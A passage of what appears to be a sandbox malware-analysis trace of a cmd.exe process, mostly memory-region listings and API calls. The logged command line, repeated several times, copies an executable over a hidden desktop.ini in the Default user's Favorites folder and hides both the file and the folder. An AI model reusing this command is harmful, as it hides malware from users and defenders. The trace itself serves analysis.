"c:\\windows\\system32\\msctf.dll") Thread: id = 712 os_tid = 0x8c4 Process: id = "512" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0x9ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30999 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31000 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31001 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31002 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 31003 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31004 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31005 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31006 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31007 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 31008 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31057 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31058 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31059 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31060 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 31061 start_va = 0x460000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 31062 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31063 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31064 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31065 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31066 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31067 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31068 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31069 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31070 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31071 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31072 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31073 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31074 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 31075 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 31076 start_va = 0x2b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 31077 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 31078 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 31079 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 31080 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 31081 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 715 os_tid = 0x9bc [0211.026] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afcac | out: lpSystemTimeAsFileTime=0x2afcac*(dwLowDateTime=0xb296e840, dwHighDateTime=0x1d440a9)) [0211.026] GetCurrentProcessId () returned 0x9ac [0211.026] GetCurrentThreadId () returned 0x9bc [0211.026] GetTickCount () returned 0x3b3a5 [0211.026] QueryPerformanceCounter (in: lpPerformanceCount=0x2afca4 | out: lpPerformanceCount=0x2afca4*=26781568638) returned 1 [0211.027] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0211.027] __set_app_type (_Type=0x1) [0211.027] __p__fmode () returned 0x76b331f4 [0211.027] __p__commode () returned 0x76b331fc [0211.027] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0211.027] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0211.027] GetCurrentThreadId () returned 0x9bc [0211.027] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9bc) returned 0x38 [0211.028] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0211.028] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0211.028] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.028] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0211.028] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afc3c | out: phkResult=0x2afc3c*=0x0) returned 0x2 [0211.028] VirtualQuery (in: lpAddress=0x2afc73, lpBuffer=0x2afc0c, dwLength=0x1c | out: lpBuffer=0x2afc0c*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0211.028] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afc0c, dwLength=0x1c | out: lpBuffer=0x2afc0c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0211.028] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afc0c, dwLength=0x1c | out: lpBuffer=0x2afc0c*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0211.028] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afc0c, dwLength=0x1c | out: lpBuffer=0x2afc0c*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0211.028] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afc0c, dwLength=0x1c | out: lpBuffer=0x2afc0c*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0211.028] GetConsoleOutputCP () returned 0x1b5 [0211.028] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0211.028] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0211.028] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.028] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0211.028] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.028] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0211.029] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.029] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0211.029] _get_osfhandle (_FileHandle=0) returned 0x3 [0211.029] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0211.029] _get_osfhandle (_FileHandle=0) returned 0x3 [0211.029] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0211.029] GetEnvironmentStringsW () returned 0x470470* [0211.029] FreeEnvironmentStringsW (penv=0x470470) returned 1 [0211.029] GetEnvironmentStringsW () returned 0x470470* [0211.029] FreeEnvironmentStringsW (penv=0x470470) returned 1 [0211.029] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aebac | out: phkResult=0x2aebac*=0x40) returned 0x0 [0211.029] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x0, lpData=0x2aebb8*=0x20, lpcbData=0x2aebb0*=0x1000) returned 0x2 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x4, lpData=0x2aebb8*=0x1, lpcbData=0x2aebb0*=0x4) returned 0x0 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x0, lpData=0x2aebb8*=0x1, lpcbData=0x2aebb0*=0x1000) returned 0x2 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x4, lpData=0x2aebb8*=0x0, lpcbData=0x2aebb0*=0x4) returned 0x0 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x4, lpData=0x2aebb8*=0x40, lpcbData=0x2aebb0*=0x4) returned 0x0 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x4, lpData=0x2aebb8*=0x40, lpcbData=0x2aebb0*=0x4) returned 0x0 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x0, lpData=0x2aebb8*=0x40, lpcbData=0x2aebb0*=0x1000) returned 0x2 [0211.030] RegCloseKey (hKey=0x40) returned 0x0 [0211.030] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aebac | out: phkResult=0x2aebac*=0x40) returned 0x0 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x0, lpData=0x2aebb8*=0x40, lpcbData=0x2aebb0*=0x1000) returned 0x2 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x4, lpData=0x2aebb8*=0x1, lpcbData=0x2aebb0*=0x4) returned 0x0 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x0, lpData=0x2aebb8*=0x1, lpcbData=0x2aebb0*=0x1000) returned 0x2 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x4, lpData=0x2aebb8*=0x0, lpcbData=0x2aebb0*=0x4) returned 0x0 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x4, lpData=0x2aebb8*=0x9, lpcbData=0x2aebb0*=0x4) returned 0x0 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x4, lpData=0x2aebb8*=0x9, lpcbData=0x2aebb0*=0x4) returned 0x0 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x0, lpData=0x2aebb8*=0x9, lpcbData=0x2aebb0*=0x1000) returned 0x2 [0211.030] RegCloseKey (hKey=0x40) returned 0x0 [0211.030] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863ad [0211.030] srand (_Seed=0x5b8863ad) [0211.030] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\"" [0211.030] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\"" [0211.031] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0211.031] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x471bd0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0211.031] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0211.031] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.031] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0211.031] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0211.031] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0211.031] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0211.031] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0211.031] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0211.031] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0211.031] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0211.031] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0211.031] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0211.031] GetEnvironmentStringsW () returned 0x4725c0* [0211.031] FreeEnvironmentStringsW (penv=0x4725c0) returned 1 [0211.032] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.032] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0211.032] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0211.032] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0211.032] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0211.032] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0211.032] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0211.032] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0211.032] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0211.032] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0211.032] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af978 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0211.032] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af978, lpFilePart=0x2af974 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af974*="Desktop") returned 0x18 [0211.032] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0211.032] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af6f4 | out: lpFindFileData=0x2af6f4) returned 0x470c50 [0211.032] FindClose (in: hFindFile=0x470c50 | out: hFindFile=0x470c50) returned 1 [0211.032] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af6f4 | out: lpFindFileData=0x2af6f4) returned 0x470c50 [0211.032] FindClose (in: hFindFile=0x470c50 | out: hFindFile=0x470c50) returned 1 [0211.032] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af6f4 | out: lpFindFileData=0x2af6f4) returned 0x470c50 [0211.032] FindClose (in: hFindFile=0x470c50 | out: hFindFile=0x470c50) returned 1 [0211.033] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0211.033] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0211.033] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0211.033] GetEnvironmentStringsW () returned 0x470470* [0211.033] FreeEnvironmentStringsW (penv=0x470470) returned 1 [0211.033] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0211.033] GetConsoleOutputCP () returned 0x1b5 [0211.033] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0211.033] GetUserDefaultLCID () returned 0x409 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afab8, cchData=128 | out: lpLCData="0") returned 2 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afab8, cchData=128 | out: lpLCData="0") returned 2 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afab8, cchData=128 | out: lpLCData="1") returned 2 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0211.034] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0211.035] GetConsoleTitleW (in: lpConsoleTitle=0x460aa8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.035] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0211.035] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0211.035] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0211.035] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0211.036] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0211.036] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0211.036] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0211.036] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0211.036] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0211.036] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0211.036] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0211.038] _wcsicmp (_String1="del", _String2=")") returned 59 [0211.038] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0211.038] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0211.038] _wcsicmp (_String1="IF", _String2="del") returned 5 [0211.038] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0211.038] _wcsicmp (_String1="REM", _String2="del") returned 14 [0211.038] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0211.040] _wcsicmp (_String1="type", _String2=")") returned 75 [0211.040] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0211.040] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0211.040] _wcsicmp (_String1="IF", _String2="type") returned -11 [0211.040] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0211.040] _wcsicmp (_String1="REM", _String2="type") returned -2 [0211.040] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0211.044] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0211.044] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0211.061] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.062] FindClose (in: hFindFile=0x472540 | out: hFindFile=0x472540) returned 1 [0211.063] FindClose (in: hFindFile=0x472540 | out: hFindFile=0x472540) returned 1 [0211.063] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0211.063] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0211.063] GetConsoleTitleW (in: lpConsoleTitle=0x2af4e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.063] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af368, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af430 | out: lpAttributeList=0x2af368, lpSize=0x2af430) returned 1 [0211.063] UpdateProcThreadAttribute (in: lpAttributeList=0x2af368, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af428, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af368, lpPreviousValue=0x0) returned 1 [0211.063] GetStartupInfoW (in: lpStartupInfo=0x2af324 | out: lpStartupInfo=0x2af324*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", 